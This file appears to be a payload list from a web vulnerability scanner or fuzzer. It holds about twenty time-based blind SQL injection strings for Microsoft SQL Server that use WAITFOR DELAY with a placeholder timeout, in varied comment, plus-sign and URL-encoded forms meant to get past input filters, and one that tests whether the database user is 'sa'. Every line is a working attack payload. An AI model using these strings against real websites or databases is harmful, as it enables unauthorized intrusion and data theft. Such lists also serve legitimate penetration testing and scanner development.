31241'and(select+1)>0waitfor/**/delay'0:0:PH_TIMEOUT
63/**/and(select+1)>0waitfor/**/delay'0:0:PH_TIMEOUT'/**/
123)waitfor/**/delay'0:0:PH_TIMEOUT'--
if+system_user='sa'+waitfor+delay'0:0:PH_TIMEOUT'
waitfor delay '0:0:PH_TIMEOUT'--
+waitfor+delay+'0:0:PH_TIMEOUT'--
/**/waitfor/**/delay/**/'0:0:PH_TIMEOUT'--
%20waitfor%20delay%20'0:0:PH_TIMEOUT'--
 waitfor delay '0:0:PH_TIMEOUT'/*
+waitfor+delay+'0:0:PH_TIMEOUT'/*
/**/waitfor/**/delay/**/'0:0:PH_TIMEOUT'/*
%20waitfor%20delay%20'0:0:PH_TIMEOUT'/*
'  waitfor delay '0:0:PH_TIMEOUT'--+
'+waitfor+delay+'0:0:PH_TIMEOUT'--+
'/**/ waitfor/**/delay/**/'0:0:PH_TIMEOUT'--+
'%20waitfor%20delay%20'0:0:PH_TIMEOUT'--
/**/and(select+1)>0waitfor/**/delay'0:0:PH_TIMEOUT'/**/
%2F%2A%2A%2Fand%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3APH_TIMEOUT%27%2F%2A%2A%2F